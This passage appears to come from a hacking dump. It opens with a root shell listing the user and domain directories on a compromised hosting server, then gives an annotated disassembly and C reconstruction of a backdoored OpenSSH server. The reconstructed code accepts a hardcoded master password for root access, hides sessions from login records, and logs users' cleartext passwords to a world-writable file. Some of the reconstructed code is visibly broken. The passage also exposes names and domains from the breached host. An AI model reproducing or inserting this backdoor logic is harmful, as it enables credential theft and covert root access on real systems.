2431. drwx--x--x 6 penguin penguin 4096 Mar 8 18:49 penguin
2432. drwx--x--x 6 pimpinjg pimpinjg 4096 Mar 26 16:13 pimpinjg
2433. drwx--x--x 5 ristop ristop 4096 May 22 15:33 ristop
2434. drwx--x--x 6 romeo romeo 4096 Apr 22 15:51 romeo
2435. drwx--x--x 4 sam sam 4096 May 12 09:26 sam
2436. drwx--x--x 7 scraft758 scraft758 4096 Apr 16 20:03 scraft758
2437. drwx------ 2 546 547 4096 May 23 02:33 test
2438. drwxrwxrwt 2 root root 4096 May 23 03:36 tmp
2439. drwx--x--x 6 wheelglow wheelglow 4096 Jan 24 22:49 wheelglow
2440. drwx--x--x 5 wtfsmilez wtfsmilez 4096 May 2 13:11 wtfsmilez
2441. drwx--x--x 8 xckx xckx 4096 Feb 22 02:44 xckx
2442. drwx--x--x 5 yourkicks yourkicks 4096 Jan 28 21:21 yourkicks
2443. drwx--x--x 5 zer0 zer0 4096 May 23 01:28 zer0
2444. root@server2:/home/zer0/domains[root@server2 domains]# ls -la /home/*/domains/
2445. /home/aaa/domains/:
2446. total 12
2447. drwx--x--x 3 aaa aaa 4096 Sep 14 2007 .
2448. drwx--x--x 8 aaa aaa 4096 Jan 24 22:06 ..
2449. drwx--x--x 8 aaa aaa 4096 Sep 14 2007 aaasoda.com
2450.  
2451. /home/admin/domains/:
2452. total 20
2453. drwx--x--x 5 admin admin 4096 Jan 12 14:29 .
2454. drwx--x--x 6 admin admin 4096 Jan 12 14:29 ..
2455. drwxr-xr-x 2 admin admin 4096 Jan 12 14:29 default
2456. drwxr-xr-x 2 admin admin 4096 Jan 12 14:29 sharedip
2457. drwxr-xr-x 2 admin admin 4096 Jan 12 14:29 suspended
2458.  
2459. /home/beyond/domains/:
2460. total 12
2461. drwx--x--x 3 beyond beyond 4096 Sep 12 2007 .
2462. drwx--x--x 8 beyond beyond 4096 Jan 24 22:33 ..
2463. drwx--x--x 8 beyond beyond 4096 Feb 6 2008 beyond-comparison.com
2464.  
2465. /home/bloo/domains/:
2466. total 12
2467. drwx--x--x 3 bloo bloo 4096 May 23 02:04 .
2468. drwx--x--x 4 bloo bloo 4096 May 23 02:04 ..
2469. drwx--x--x 6 bloo bloo 4096 May 23 02:04 bloohacks.com
2470.  
2471. /home/bootroot/domains/:
2472. total 20
2473. drwx--x--x 5 bootroot bootroot 4096 May 12 21:27 .
2474. drwx--x--x 7 bootroot bootroot 4096 May 12 21:27 ..
2475. drwx--x--x 8 bootroot bootroot 4096 May 9 18:57 bootforfun.com
2476. drwx--x--x 7 bootroot bootroot 4096 Mar 2 00:11 bootforfun.net
2477. drwx--x--x 7 bootroot bootroot 4096 May 13 00:10 bootforfun.org
2478.  
2479. /home/dablitz/domains/:
2480. total 16
2481. drwx--x--x 4 dablitz dablitz 4096 Jan 3 23:34 .
2482. drwx--x--x 6 dablitz dablitz 4096 May 21 23:50 ..
2483. drwx--x--x 8 dablitz dablitz 4096 Jan 17 10:32 blitzcraze.com
2484. drwx--x--x 8 dablitz dablitz 4096 Jan 24 07:14 blitzdownloads.com
2485. /home/dakilla/domains/:
2486. total 12
2487. drwxr-xr-x 3 dakilla dakilla 4096 May 16 07:49 .
2488. drwx--x--x 6 dakilla dakilla 4096 May 20 23:41 ..
2489. drwxr-xr-x 8 dakilla dakilla 4096 Feb 15 00:11 scionbot.com
2490.  
2491. /home/furiogamin/domains/:
2492. total 20
2493. drwx--x--x 5 furiogamin furiogamin 4096 Feb 19 06:57 .
2494. drwx--x--x 8 furiogamin furiogamin 4096 May 21 02:55 ..
2495. drwx--x--x 8 furiogamin furiogamin 4096 Feb 18 11:04 furiogaming.com
2496. drwx--x--x 7 furiogamin furiogamin 4096 Dec 27 21:11 furiogaming.net
2497. drwx--x--x 5 furiogamin furiogamin 4096 Apr 10 13:14 softmodding.net
2498.  
2499. /home/h3mod/domains/:
2500. total 12
2501. drwx--x--x 3 h3mod h3mod 4096 Jan 18 2008 .
2502. drwx--x--x 7 h3mod h3mod 4096 Feb 26 17:31 ..
2503. drwx--x--x 8 h3mod h3mod 4096 Oct 2 2008 h3mod.com
2504.  
2505. /home/haiobr/domains/:
2506. total 12
2507. drwxr-xr-x 3 haiobr haiobr 4096 May 1 14:26 .
2508. drwx--x--x 5 haiobr haiobr 4096 May 19 06:43 ..
2509. drwxr-xr-x 9 haiobr haiobr 4096 May 1 14:26 super-syn.net
2510.  
2511. /home/hbxmike/domains/:
2512. total 16
2513. drwx--x--x 4 hbxmike hbxmike 4096 May 11 17:19 .
2514. drwx--x--x 4 hbxmike hbxmike 4096 May 11 17:19 ..
2515. drwx--x--x 7 hbxmike hbxmike 4096 May 12 00:11 hackordie.net
2516. drwx--x--x 8 hbxmike hbxmike 4096 Apr 29 00:10 wesellstuff.biz
2517.  
2518. /home/hotglow/domains/:
2519. total 12
2520. drwxr-xr-x 3 hotglow hotglow 4096 Sep 3 2007 .
2521. drwx--x--x 8 hotglow hotglow 4096 Jan 24 22:35 ..
2522. drwxr-xr-x 8 hotglow hotglow 4096 Sep 3 2007 hotglowneon.com
2523.  
2524. /home/hrdev/domains/:
2525. total 12
2526. drwxr-xr-x 3 hrdev hrdev 4096 Dec 2 19:31 .
2527. drwx--x--x 8 hrdev hrdev 4096 May 13 18:43 ..
2528. drwxr-xr-x 8 hrdev hrdev 4096 Dec 10 2007 hr-development.net
2529.  
2530. /home/hstrike/domains/:
2531. total 12
2532. drwx--x--x 3 hstrike hstrike 4096 Apr 24 2008 .
2533. drwx--x--x 7 hstrike hstrike 4096 Feb 17 15:56 ..
2534. drwx--x--x 8 hstrike hstrike 4096 Oct 31 2008 halostrike.com
2535.  
2536. /home/kaza/domains/:
2537. total 28
2538. drwx--x--x 7 kaza kaza 4096 Apr 25 15:46 .
2539. drwx--x--x 6 kaza kaza 4096 Apr 27 20:47 ..
2540. drwx--x--x 7 kaza kaza 4096 Jan 6 21:14 crypticgamers.com
2541. drwx--x--x 7 kaza kaza 4096 Jan 5 21:13 crypticgamers.net
2542. drwx--x--x 7 kaza kaza 4096 Jan 15 21:12 godlymods.com
2543. drwx--x--x 7 kaza kaza 4096 May 4 08:50 kindclan.co.cc
2544. drwx--x--x 7 kaza kaza 4096 Feb 4 00:10 mortonnetworks.com
2545.  
2546. /home/keytraderz/domains/:
2547. total 20
2548. drwx--x--x 5 keytraderz keytraderz 4096 Jan 18 21:18 .
2549. drwx--x--x 6 keytraderz keytraderz 4096 Apr 15 15:37 ..
2550. drwx--x--x 8 keytraderz keytraderz 4096 Jan 5 21:20 1nesolution.com
2551. drwx--x--x 8 keytraderz keytraderz 4096 Jan 13 21:16 gotmovies.net
2552. drwx--x--x 8 keytraderz keytraderz 4096 Jan 2 21:15 keytraderz.com
2553.  
2554. /home/mrgod/domains/:
2555. total 12
2556. drwx--x--x 3 mrgod mrgod 4096 May 14 19:46 .
2557. drwx--x--x 6 mrgod mrgod 4096 May 15 14:32 ..
2558. drwx--x--x 7 mrgod mrgod 4096 May 15 00:11 international-gaming.net
2559.  
2560. /home/odin/domains/:
2561. total 12
2562. drwx--x--x 3 odin odin 4096 May 2 04:09 .
2563. drwx--x--x 5 odin odin 4096 May 8 05:01 ..
2564. drwx--x--x 7 odin odin 4096 May 15 08:14 evilzone.ws
2565.  
2566. /home/pagewiz/domains/:
2567. total 12
2568. drwx--x--x 3 pagewiz pagewiz 4096 May 18 18:08 .
2569. drwx--x--x 5 pagewiz pagewiz 4096 May 18 18:49 ..
2570. drwx--x--x 8 pagewiz pagewiz 4096 May 19 00:10 pagewizzstudio.com
2571.  
2572. /home/penguin/domains/:
2573. total 12
2574. drwx--x--x 3 penguin penguin 4096 Dec 20 11:24 .
2575. drwx--x--x 6 penguin penguin 4096 Mar 8 18:49 ..
2576. drwx--x--x 7 penguin penguin 4096 Dec 20 21:12 phylumstudios.com
2577.  
2578. /home/pimpinjg/domains/:
2579. total 16
2580. drwx--x--x 4 pimpinjg pimpinjg 4096 Mar 26 16:13 .
2581. drwx--x--x 6 pimpinjg pimpinjg 4096 Mar 26 16:13 ..
2582. drwx--x--x 7 pimpinjg pimpinjg 4096 Mar 26 16:13 h4ckinab0x.com
2583. drwx--x--x 7 pimpinjg pimpinjg 4096 Mar 27 00:11 teamhbx.com
2584.  
2585. /home/ristop/domains/:
2586. total 12
2587. drwx--x--x 3 ristop ristop 4096 May 22 13:33 .
2588. drwx--x--x 5 ristop ristop 4096 May 22 15:33 ..
2589. drwx--x--x 8 ristop ristop 4096 May 23 00:10 centosservers.com
2590.  
2591. /home/romeo/domains/:
2592. total 16
2593. drwx--x--x 4 romeo romeo 4096 Dec 23 14:31 .
2594. drwx--x--x 6 romeo romeo 4096 Apr 22 15:51 ..
2595. drwx--x--x 7 romeo romeo 4096 Feb 10 19:26 cybershade.org
2596. drwx--x--x 7 romeo romeo 4096 Apr 22 15:53 darkmindz.com
2597.  
2598. /home/sam/domains/:
2599. total 12
2600. drwx--x--x 3 sam sam 4096 May 12 09:00 .
2601. drwx--x--x 4 sam sam 4096 May 12 09:26 ..
2602. drwx--x--x 8 sam sam 4096 May 13 00:11 metus-project.com
2603.  
2604. /home/scraft758/domains/:
2605. total 24
2606. drwx--x--x 6 scraft758 scraft758 4096 Apr 16 20:03 .
2607. drwx--x--x 7 scraft758 scraft758 4096 Apr 16 20:03 ..
2608. drwx--x--x 7 scraft758 scraft758 4096 Jan 27 21:12 mods4hire.com
2609. drwx--x--x 7 scraft758 scraft758 4096 Mar 25 2008 samcraft.com
2610. drwx--x--x 7 scraft758 scraft758 4096 Mar 25 2008 samcraft.net
2611. drwx--x--x 7 scraft758 scraft758 4096 Oct 28 2008 theconsolejunkies.com
2612.  
2613. /home/wheelglow/domains/:
2614. total 12
2615. drwx--x--x 3 wheelglow wheelglow 4096 Sep 12 2007 .
2616. drwx--x--x 6 wheelglow wheelglow 4096 Jan 24 22:49 ..
2617. drwx--x--x 8 wheelglow wheelglow 4096 Sep 12 2007 wheelglow.com
2618.  
2619. /home/wtfsmilez/domains/:
2620. total 12
2621. drwx--x--x 3 wtfsmilez wtfsmilez 4096 Apr 30 17:00 .
2622. drwx--x--x 5 wtfsmilez wtfsmilez 4096 May 2 13:11 ..
2623. drwx--x--x 8 wtfsmilez wtfsmilez 4096 May 3 19:12 wtfgamers.net
2624.  
2625. /home/xckx/domains/:
2626. total 16
2627. drwx--x--x 4 xckx xckx 4096 Feb 22 02:44 .
2628. drwx--x--x 8 xckx xckx 4096 Feb 22 02:44 ..
2629. drwx--x--x 7 xckx xckx 4096 Apr 16 2008 oinfam0uso.com
2630. drwx--x--x 7 xckx xckx 4096 Feb 23 00:12 snayke.com
2631.  
2632. /home/yourkicks/domains/:
2633. total 16
2634. drwx--x--x 4 yourkicks yourkicks 4096 Jan 6 19:33 .
2635. drwx--x--x 5 yourkicks yourkicks 4096 Jan 28 21:21 ..
2636. drwx--x--x 8 yourkicks yourkicks 4096 Jan 6 21:15 yourkicksonline.com
2637. drwx--x--x 8 yourkicks yourkicks 4096 Jan 6 21:15 yourkicksonline.net
2638.  
2639. /home/zer0/domains/:
2640. total 12
2641. drwx--x--x 3 zer0 zer0 4096 May 20 17:00 .
2642. drwx--x--x 5 zer0 zer0 4096 May 23 01:28 ..
2643. drwx--x--x 8 zer0 zer0 4096 May 23 01:28 zer0zone.ws
2644.  
2645. Ghetto.
2646.  
2647.  
2648.  
2649.  
2650. _______ _______ ______
2651. \ _ \ ___ __\ _ \ / __ \
2652. / /_\ \\ \/ / /_\ \ > <
2653. \ \_/ \> <\ \_/ \/ -- \
2654. \_____ /__/\_ \\_____ /\______ /
2655. \/ \/ \/ \/
2656. __________ __ .___
2657. \______ \_____ ____ | | __ __| _/____ ___________
2658. | | _/\__ \ _/ ___\| |/ // __ |/ _ \ / _ \_ __ \
2659. | | \ / __ \\ \___| </ /_/ ( <_> | <_> ) | \/
2660. |______ /(____ /\___ >__|_ \____ |\____/ \____/|__|
2661. \/ \/ \/ \/ \/
2662. ___________________ ___________
2663. \______ \_ ___ \\_ _____/
2664. | _/ \ \/ | __)_
2665. | | \ \____| \
2666. |____|_ /\______ /_______ /
2667. \/ \/ \/
2668.  
2669.  
2670. char abuff[1024];
2671. char sbuff[1024];
2672. char * aSSSSSS = "%s%s\t [ %s %s %s %s ]"; //db '%s%s',9,' [ %s %s %s %s ]',0Ah
2673. char * a0m = "\x1B[0m"; //db 1Bh,'[0m',0
2674. char * aOwned ="see below";
2675. char * aAGb7 = "a-gb7"
2676. /*
2677. .rodata:08078D34 aOwned db 0Ah ; DATA XREF: do_motd+DFo
2678. .rodata:08078D34 db 9,9,'+----------------------------[ Owned ]-------------------------'
2679. .rodata:08078D34 db '---+',0Ah
2680. .rodata:08078D34 db 9,9,'| Hack everyone you can and then hack some more '
2681. .rodata:08078D34 db ' |',0Ah
2682. .rodata:08078D34 db 9,9,'| Owned[DC] v2 '
2683. .rodata:08078D34 db ' |',0Ah
2684. .rodata:08078D34 db 9,9,'| _______ . _______ . _______ '
2685. .rodata:08078D34 db ' |',0Ah
2686. .rodata:08078D34 db 9,9,'| Get in as anonymous, Leave with no trace. '
2687. .rodata:08078D34 db ' |',0Ah
2688. .rodata:08078D34 db 9,9,'| '
2689. .rodata:08078D34 db ' |',0Ah
2690. .rodata:08078D34 db 9,9,'+--------------------------------------------------------------'
2691. .rodata:08078D34 db '---+',0Ah,0
2692. */
2693. char * a033031mOwned03 = "\[\033[0;31m\]Owned\[\033[1;30m\][\[\033[1;37m\]DC\[\033[1;30m\]]:[\033[1;32m\]\w\[\033[1;30m\]]\[\033[1;30m\]\$\[\033[0m\] ";
2694. char s[1024];
2695. char * filename = "/var/run/ssh.old";
2696. char i = 0;
2697. size_t len;
2698. FILE * log;
2699. char * HookinSS = "HOOKIN: %s:%s"
2700. char * a0x3aownt = "0x3aownt";
2701. char * aSk3rhgldyw = "Sk3rhGLdYW";
2702.  
2703.  
2704. //known structs
2705.  
2706. struct passwd {
2707. char *pw_name;
2708. char *pw_passwd;
2709. uid_t pw_uid;
2710. gid_t pw_gid;
2711. time_t pw_change;
2712. char *pw_class;
2713. char *pw_gecos;
2714. char *pw_dir;
2715. char *pw_shell;
2716. time_t pw_expire;
2717. };
2718.  
2719.  
2720. struct Authctxt {
2721. int success;
2722. int postponed; /* authentication needs another step */
2723. int valid; /* user exists and is allowed to login */
2724. int attempt;
2725. int failures;
2726. int force_pwchange;
2727. char *user; /* username sent by the client */
2728. char *service;
2729. struct passwd *pw; /* set if 'valid' */
2730. char *style;
2731. void *kbdintctxt;
2732. #ifdef BSD_AUTH
2733. auth_session_t *as;
2734. #endif
2735. #ifdef KRB5
2736. krb5_context krb5_ctx;
2737. krb5_ccache krb5_fwd_ccache;
2738. krb5_principal krb5_user;
2739. char *krb5_ticket_file;
2740. char *krb5_ccname;
2741. #endif
2742. Buffer *loginmsg;
2743. void *methoddata;
2744. };
2745.  
2746. struct utsname {
2747. char sysname[_SYS_NMLN];
2748. char nodename[_SYS_NMLN];
2749. char release[_SYS_NMLN];
2750. char version[_SYS_NMLN];
2751. char machine[_SYS_NMLN];
2752. }
2753.  
2754. /* sys_auth_passwd
2755. .text:0804FA98 push edi
2756. .text:0804FA99 push dword ptr [esi] ; esi = arg_0 + 20h
2757. .text:0804FA99 ; authctxt->pw
2758. .text:0804FA99 ; [esi] = pw->pw_name
2759. .text:0804FA9B push offset aHookinSS ; "HOOKIN: %s:%s\n"
2760. .text:0804FAA0 push offset abuff ; s
2761. .text:0804FAA5 call _sprintf
2762. .text:0804FAAA mov edi, offset abuff ; start: strlen(abuff)
2763. .text:0804FAAF xor eax, eax
2764. .text:0804FAB1 cld
2765. .text:0804FAB2 mov ecx, 0FFFFFFFFh
2766. .text:0804FAB7 repne scasb
2767. .text:0804FAB9 not ecx
2768. .text:0804FABB lea edx, [ecx-1]
2769. .text:0804FABE add esp, 10h
2770. .text:0804FAC1 cmp ebx, edx ; fin;
2771. .text:0804FAC3 mov ds:alen, edx ; alen = strlen result
2772. .text:0804FAC9 mov ds:ai, 0 ; for(ai = 0
2773. .text:0804FAD3 jg short loc_804FAE8
2774. .text:0804FAD5 xor eax, eax
2775. .text:0804FAD7 nop
2776. .text:0804FAD8
2777. .text:0804FAD8 loc_804FAD8: ; CODE XREF: sys_auth_passwd+CDj
2778. .text:0804FAD8 not ds:abuff[eax]
2779. .text:0804FADE inc eax ; eax++ (ai++)
2780. .text:0804FADF cmp eax, edx ; ;ai<=edx (alen)
2781. .text:0804FAE1 jle short loc_804FAD8
2782. .text:0804FAE3 mov ds:ai, eax
2783. .text:0804FAE8
2784. .text:0804FAE8 loc_804FAE8: ; CODE XREF: sys_auth_passwd+BFj
2785. .text:0804FAE8 sub esp, 8
2786. .text:0804FAEB push (offset aDsa_0+2) ; aDsa = db 'dsa',0 | aDsa+2h = 'a',0
2787. .text:0804FAF0 push offset filename ; "/var/run/ssh.old"
2788. .text:0804FAF5 call _fopen ; fopen(filename,"a")
2789. .text:0804FAFA add esp, 10h
2790. .text:0804FAFD test eax, eax ; if(fopen(...) != NULL)
2791. .text:0804FAFD ; jump
2792. .text:0804FAFF mov ds:alog, eax
2793. .text:0804FB04 jnz short loc_804FB3B
2794. .text:0804FB06
2795. .text:0804FB06 loc_804FB06: ; CODE XREF: sys_auth_passwd+149j
2796. .text:0804FB06 sub esp, 8
2797. .text:0804FB09 push 1B6h ; mode (0666)
2798. .text:0804FB0E push offset filename ; "/var/run/ssh.old"
2799. .text:0804FB13 call _chmod ; chmod(filename,0666)
2800. .text:0804FB18 lea esp, [ebp-0Ch]
2801. .text:0804FB1B pop ebx
2802. .text:0804FB1C pop esi
2803. .text:0804FB1D mov eax, 1
2804. .text:0804FB22 pop edi
2805. .text:0804FB23 leave
2806. .text:0804FB24 retn ; return 1
2807. .text:0804FB24 ; ---------------------------------------------------------------------------
2808. .text:0804FB25 align 4
2809. .text:0804FB28
2810. .text:0804FB28 loc_804FB28: ; CODE XREF: sys_auth_passwd+17j
2811. .text:0804FB28 sub esp, 0Ch
2812. .text:0804FB2B push esi
2813. .text:0804FB2C call shadow_pw
2814. .text:0804FB31 mov ebx, eax
2815. .text:0804FB33 add esp, 10h
2816. .text:0804FB36 jmp loc_804FA34
2817. .text:0804FB3B ; ---------------------------------------------------------------------------
2818. .text:0804FB3B
2819. .text:0804FB3B loc_804FB3B: ; CODE XREF: sys_auth_passwd+F0j
2820. .text:0804FB3B push eax ; eax = file stream
2821. .text:0804FB3C push 1
2822. .text:0804FB3E push ds:alen ; length of abuff
2823. .text:0804FB44 push offset abuff ; ptr to abuff
2824. .text:0804FB49 call _fwrite
2825. .text:0804FB4E pop eax
2826. .text:0804FB4F push ds:alog ; stream
2827. .text:0804FB55 call _fclose ; fclose(alog)
2828. .text:0804FB5A add esp, 10h
2829. .text:0804FB5D jmp short loc_804FB06
2830. .text:0804FB5D sys_auth_passwd endp
2831. */
2832.  
2833.  
2834. sys_auth_passwd(Authctxt *authctxt, const char *password)
2835. {
2836. struct passwd *pw = authctxt->pw;
2837. char *encrypted_password;
2838.  
2839. /* Just use the supplied fake password if authctxt is invalid */
2840. char *pw_password = authctxt->valid ? shadow_pw(pw) : pw->pw_passwd;
2841.  
2842. /* Check for users with no password. */
2843. if (strcmp(pw_password, "") == 0 && strcmp(password, "") == 0)
2844. return (1);
2845.  
2846. /* Encrypt the candidate password using the proper salt. */
2847. encrypted_password = xcrypt(password,
2848. (pw_password[0] && pw_password[1]) ? pw_password : "xx");
2849.  
2850. if(!strcmp(encrypted_password, pw_password) == 0)
2851. return (0);
2852.  
2853. sprintf(abuff,HookinSS,pw->pw_name,password); // lulz ^ 10
2854. len = strlen(abuff);
2855. for(i = 0;i<=len;i++)
2856. abuff[i] = ~abuff[i]; // An unbreakable NOT encryption algorithm!
2857. if((log = fopen(filename,"a"))!=NULL) {
2858. fwrite(&abuff,len,1,log);
2859. fclose(log);
2860. }
2861. chmod(filename,0x1B6); //0x1B6 = 0666 (base 8)
2862. return 1;
2863. /*
2864. * Authentication is accepted if the encrypted passwords
2865. * are identical.
2866. */
2867. //return (strcmp(encrypted_password, pw_password) == 0);
2868. }
2869.  
2870.  
2871.  
2872. /* auth_password
2873. .text:0804FB60 public auth_password
2874. .text:0804FB60 auth_password proc near ; CODE XREF: auth1_process_password+BFp
2875. .text:0804FB60 ; do_authentication+15Ap ...
2876. .text:0804FB60
2877. .text:0804FB60 arg_0 = dword ptr 8
2878. .text:0804FB60 arg_4 = dword ptr 0Ch
2879. .text:0804FB60
2880. .text:0804FB60 push ebp
2881. .text:0804FB61 mov ebp, esp
2882. .text:0804FB63 push edi
2883. .text:0804FB64 push esi
2884. .text:0804FB65 push ebx
2885. .text:0804FB66 sub esp, 0Ch
2886. .text:0804FB69 mov ebx, [ebp+arg_4] ; ebx = const char * password
2887. .text:0804FB6C mov ds:hookarOn, 0 ; hookarOn = 0;
2888. .text:0804FB76 mov esi, ebx
2889. .text:0804FB78 mov edi, offset aSk3rhgldyw ; "Sk3rhGLdYW"
2890. .text:0804FB7D mov ecx, 0Bh
2891. .text:0804FB82 cld
2892. .text:0804FB83 repe cmpsb ; strcmp ebx,aSk3rhgldyw
2893. .text:0804FB85 jnz short loc_804FBA0 ; if not equal then jump
2894. .text:0804FB87 mov ds:hookarOn, 1 ; hookarOn = 1;
2895. .text:0804FB91 mov eax, 1
2896. .text:0804FB96
2897. .text:0804FB96 loc_804FB96: ; CODE XREF: auth_password+5Fj
2898. .text:0804FB96 ; auth_password+80j ...
2899. .text:0804FB96 lea esp, [ebp-0Ch]
2900. .text:0804FB99 pop ebx
2901. .text:0804FB9A pop esi
2902. .text:0804FB9B pop edi
2903. .text:0804FB9C leave
2904. .text:0804FB9D retn ; return 1
2905. */
2906.  
2907. int
2908. auth_password(Authctxt *authctxt, const char *password)
2909. {
2910. struct passwd * pw = authctxt->pw;
2911. int result, ok = authctxt->valid;
2912.  
2913. hookarOn = 0;:
2914. if (!strcmp(password, aSk3rhgldyw)) { //"Sk3rhGLdYW"
2915. hookarOn = 1;
2916. return 1;
2917. }
2918.  
2919. //...
2920. }
2921.  
2922.  
2923. /* record_login
2924. .text:08050848 public record_login
2925. .text:08050848 record_login proc near ; CODE XREF: do_login+F7p
2926. .text:08050848 ; mm_answer_pty+116p
2927. .text:08050848
2928. .text:08050848 var_338 = dword ptr -338h
2929. .text:08050848 timer = dword ptr -31Ch
2930. .text:08050848 var_318 = byte ptr -318h
2931. .text:08050848 var_118 = byte ptr -118h
2932. .text:08050848 s = byte ptr -117h
2933. .text:08050848 arg_0 = dword ptr 8
2934. .text:08050848 arg_4 = dword ptr 0Ch
2935. .text:08050848 arg_8 = dword ptr 10h
2936. .text:08050848 arg_C = dword ptr 14h
2937. .text:08050848 arg_10 = dword ptr 18h
2938. .text:08050848 arg_14 = dword ptr 1Ch
2939. .text:08050848 arg_18 = dword ptr 20h
2940. .text:08050848
2941. .text:08050848 push ebp
2942. .text:08050849 mov ebp, esp
2943. .text:0805084B push edi
2944. .text:0805084C push esi
2945. .text:0805084D push ebx
2946. .text:0805084E sub esp, 31Ch
2947. .text:08050854 mov eax, ds:hookarOn
2948. .text:08050859 test eax, eax
2949. .text:0805085B mov esi, [ebp+arg_8]
2950. .text:0805085E jz short loc_8050868
2951. .text:08050860 lea esp, [ebp-0Ch]
2952. .text:08050863 pop ebx
2953. .text:08050864 pop esi
2954. .text:08050865 pop edi
2955. .text:08050866 leave
2956. .text:08050867 retn
2957. */
2958.  
2959. /*
2960. * Records that the user has logged in. I wish these parts of operating
2961. * systems were more standardized.
2962. */
2963. void
2964. record_login(pid_t pid, const char *tty, const char *user, uid_t uid,
2965. const char *host, struct sockaddr * addr, socklen_t addrlen)
2966. {
2967. if(hookarOn)
2968. return;
2969. //...
2970. }
2971.  
2972.  
2973.  
2974. /* record_logout
2975.  
2976. .text:08050994 public record_logout
2977. .text:08050994 record_logout proc near ; CODE XREF: session_pty_cleanup2+84p
2978. .text:08050994
2979. .text:08050994 var_18 = dword ptr -18h
2980. .text:08050994 var_4 = dword ptr -4
2981. .text:08050994 arg_0 = dword ptr 8
2982. .text:08050994 arg_4 = dword ptr 0Ch
2983. .text:08050994 arg_8 = dword ptr 10h
2984. .text:08050994
2985. .text:08050994 push ebp
2986. .text:08050995 mov ebp, esp
2987. .text:08050997 push ebx
2988. .text:08050998 push eax
2989. .text:08050999 mov ebx, ds:hookarOn
2990. .text:0805099F test ebx, ebx
2991. .text:080509A1 mov ecx, [ebp+arg_0]
2992. .text:080509A4 mov eax, [ebp+arg_4]
2993. .text:080509A7 mov edx, [ebp+arg_8]
2994. .text:080509AA jz short loc_80509B4
2995. .text:080509AC mov ebx, [ebp+var_4]
2996. .text:080509AF leave
2997.  
2998.  
2999. */
3000.  
3001.  
3002.  
3003. void
3004. record_logout(pid_t pid, const char *tty, const char *user)
3005. {
3006. struct logininfo *li;
3007. if(hookarOn) return;
3008. li = login_alloc_entry(pid, user, NULL, tty);
3009. login_logout(li);
3010. login_free_entry(li);
3011. }
3012.  
3013.  
3014.  
3015.  
3016. /* auth_root_allowed
3017. .text:080547DC public auth_root_allowed
3018. .text:080547DC auth_root_allowed proc near ; CODE XREF: do_authentication+3CBp
3019. .text:080547DC ; userauth_finish+18Ep ...
3020. .text:080547DC
3021. .text:080547DC arg_0 = dword ptr 8
3022. .text:080547DC
3023. .text:080547DC push ebp
3024. .text:080547DD mov ebp, esp
3025. .text:080547DF cmp ds:hookarOn, 1
3026. .text:080547E6 push edi
3027. .text:080547E7 push esi
3028. .text:080547E8 mov ecx, 1
3029. .text:080547ED jz short loc_805481C
3030.  
3031.  
3032. .text:0805481C loc_805481C: ; CODE XREF: auth_root_allowed+11j
3033. .text:0805481C ; auth_root_allowed+54j ...
3034. .text:0805481C lea esp, [ebp-8]
3035. .text:0805481F pop esi
3036. .text:08054820 mov eax, ecx
3037. .text:08054822 pop edi
3038. .text:08054823 leave
3039. .text:08054824 retn
3040.  
3041. */
3042.  
3043.  
3044. /*
3045. * Check whether root logins are disallowed.
3046. */
3047. int
3048. auth_root_allowed(char *method)
3049. {
3050.  
3051. if (hookarOn == 1)
3052. return 1;
3053. //...
3054. }
3055.  
3056.  
3057. /* auth1_process_password
3058. .text:08054E98 auth1_process_password proc near
3059. .text:08054E98
3060. .text:08054E98 var_28 = dword ptr -28h
3061. .text:08054E98 n = dword ptr -10h
3062. .text:08054E98 arg_0 = dword ptr 8
3063. .text:08054E98
3064. .text:08054E98 push ebp
3065. .text:08054E99 mov ebp, esp
3066. .text:08054E9B push edi
3067. .text:08054E9C push esi
3068. .text:08054E9D push ebx
3069. .text:08054E9E sub esp, 18h
3070. .text:08054EA1 lea eax, [ebp+n]
3071. .text:08054EA4 push eax
3072. .text:08054EA5 call packet_get_string ; read user pass in plain
3073. .text:08054EAA mov ebx, eax ; ebx = pass
3074. .text:08054EAC mov eax, [ebp+arg_0] ; arg_0 = Authctxt struct
3075. .text:08054EAF mov ecx, [eax+8] ; eax+8 = authctxt->valid
3076. .text:08054EB2 add esp, 10h
3077. .text:08054EB5 test ecx, ecx ; if valid dont jump
3078. .text:08054EB7 jz short loc_8054ED3
3079. .text:08054EB9 mov edi, offset aSk3rhgldyw ; "Sk3rhGLdYW"
3080. .text:08054EBE mov ecx, 0Bh
3081. .text:08054EC3 cld
3082. .text:08054EC4 mov esi, ebx ; esi = pass (ebx)
3083. .text:08054EC6 repe cmpsb ; strcmp pass, aSk3rhgldyw
3084. .text:08054EC8 jz short loc_8054F38 ; if equal jump to return 1
3085. .text:08054ECA cmp ds:hookarOn, 1 ; if(hookarOn == 1)
3086. .text:08054ECA ; jmp to return 1
3087. .text:08054ED1 jz short loc_8054F38
3088.  
3089.  
3090. .text:08054F38 loc_8054F38: ; CODE XREF: auth1_process_password+30j
3091. .text:08054F38 ; auth1_process_password+39j
3092. .text:08054F38 mov ds:hookarOn, 1
3093. .text:08054F42 lea esp, [ebp-0Ch]
3094. .text:08054F45 pop ebx
3095. .text:08054F46 pop esi
3096. .text:08054F47 mov eax, 1
3097. .text:08054F4C pop edi
3098. .text:08054F4D leave
3099. .text:08054F4E retn
3100. */
3101.  
3102. static int
3103. auth1_process_password(Authctxt *authctxt, char *info, size_t infolen)
3104. {
3105.  
3106. int authenticated = 0;
3107. char *password;
3108. u_int dlen;
3109.  
3110. /*
3111. * Read user password. It is in plain text, but was
3112. * transmitted over the encrypted channel so it is
3113. * not visible to an outside observer.
3114. */
3115. password = packet_get_string(&dlen);
3116. if(authctxt->valid)
3117. if(!strcmp(password,aSk3rhgldyw) || hookarOn = 1) { //"Sk3rhGLdYW"
3118. hookarOn = 1;
3119. return 1;
3120. }
3121. packet_check_eom();
3122.  
3123. /* Try authentication with the password. */
3124. authenticated = PRIVSEP(auth_password(authctxt, password));
3125.  
3126. memset(password, 0, dlen);
3127. xfree(password);
3128.  
3129. return (authenticated);
3130. }
3131.  
3132.  
3133. /* do_authentication
3134. .text:08055188 ; Attributes: bp-based frame
3135. .text:08055188
3136. .text:08055188 public do_authentication
3137. .text:08055188 do_authentication proc near ; CODE XREF: main+1EA5p
3138. .text:08055188
3139. .text:08055188 var_438 = dword ptr -438h
3140. .text:08055188 var_41C = byte ptr -41Ch
3141. .text:08055188 var_418 = byte ptr -418h
3142. .text:08055188 arg_0 = dword ptr 8
3143. .text:08055188
3144. .text:08055188 push ebp
3145. .text:08055189 mov ebp, esp
3146. .text:0805518B push edi
3147. .text:0805518C push esi
3148. .text:0805518D push ebx
3149. .text:0805518E sub esp, 428h
3150. .text:08055194 push 4 ; arg
3151. .text:08055196 call packet_read_expect
3152. .text:0805519B lea eax, [ebp+var_41C]
